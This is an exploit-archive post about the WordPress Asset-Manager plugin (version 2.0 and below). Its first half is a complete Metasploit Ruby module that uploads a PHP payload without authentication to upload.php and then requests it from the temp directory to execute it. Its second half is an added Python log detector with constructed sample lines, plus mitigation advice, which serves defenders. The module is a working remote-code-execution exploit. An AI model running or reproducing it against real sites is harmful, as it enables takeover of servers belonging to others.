
WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This module, from the Metasploit exploit library, exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. It allows PHP file uploads: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body the plugin's upload.php expects
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored file name back on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # Request the uploaded file from the plugin's temp directory to run it
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
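The module above leaves a distinctive two-step trace in the web server's access log: a POST to the plugin's upload.php, then a GET for a .php file under wp-content/uploads/assets/temp/. The following detector is an added example written for this post, not code from the module, its authors or the plugin; it scans combined-format access-log lines for that sequence. The log lines, client addresses and file names are constructed for the example; only the two request paths come from the module.

```python
import re

# Constructed sample access-log lines (combined log format). The IPs, timestamps
# and file names are invented for this example; the two paths are the ones the
# Metasploit module requests.
SAMPLE_LOG = """\
203.0.113.7 - - [31/Dec/2012:09:20:01 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 57 "-" "Mozilla/5.0"
203.0.113.7 - - [31/Dec/2012:09:20:02 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kzqwe.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.4 - - [31/Dec/2012:09:21:10 +0000] "GET /wordpress/wp-content/uploads/assets/temp/photo.jpg HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.9 - - [31/Dec/2012:09:22:00 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 403 0 "-" "curl/7.26"
"""

# One combined-log-format line: client address, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# The two endpoints touched by the module: the unauthenticated upload handler
# and the temp directory it writes into.
UPLOAD_ENDPOINT = re.compile(r'/wp-content/plugins/asset-manager/upload\.php$')
TEMP_PHP = re.compile(r'/wp-content/uploads/assets/temp/[^/]+\.php$')


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev['status'] = int(ev['status'])
    ev['path'] = ev['path'].split('?', 1)[0]  # ignore any query string
    return ev


def find_findings(log_text):
    """Scan log text and return a list of (ip, stage, path) tuples.

    stage is one of:
      'upload_attempt'   POST to upload.php that the server did not answer 200
      'upload_accepted'  POST to upload.php answered 200 (file likely written)
      'php_in_temp'      GET of a .php file under the plugin temp directory
      'upload_then_exec' that GET came from a client whose upload was accepted
    """
    accepted = set()   # clients with at least one accepted upload so far
    findings = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        if ev['method'] == 'POST' and UPLOAD_ENDPOINT.search(ev['path']):
            if ev['status'] == 200:
                accepted.add(ev['ip'])
                findings.append((ev['ip'], 'upload_accepted', ev['path']))
            else:
                findings.append((ev['ip'], 'upload_attempt', ev['path']))
        elif ev['method'] == 'GET' and TEMP_PHP.search(ev['path']):
            stage = 'upload_then_exec' if ev['ip'] in accepted else 'php_in_temp'
            findings.append((ev['ip'], stage, ev['path']))
    return findings


def high_confidence(findings):
    """Keep only findings where a .php file was actually requested from the temp dir."""
    return [f for f in findings if f[1] in ('php_in_temp', 'upload_then_exec')]


if __name__ == '__main__':
    for ip, stage, path in find_findings(SAMPLE_LOG):
        print(f'{ip:15} {stage:18} {path}')
```

A legitimate user of the plugin also POSTs to upload.php, so that event alone is noise; the request for a .php file inside the uploads tree is the signal worth alerting on, since nothing under wp-content/uploads should ever be executed as PHP. The lasting fix on the server side is to disable PHP execution for that directory (for example `php_flag engine off` in an Apache .htaccess, or an nginx location block that never passes the path to PHP-FPM) in addition to updating the plugin.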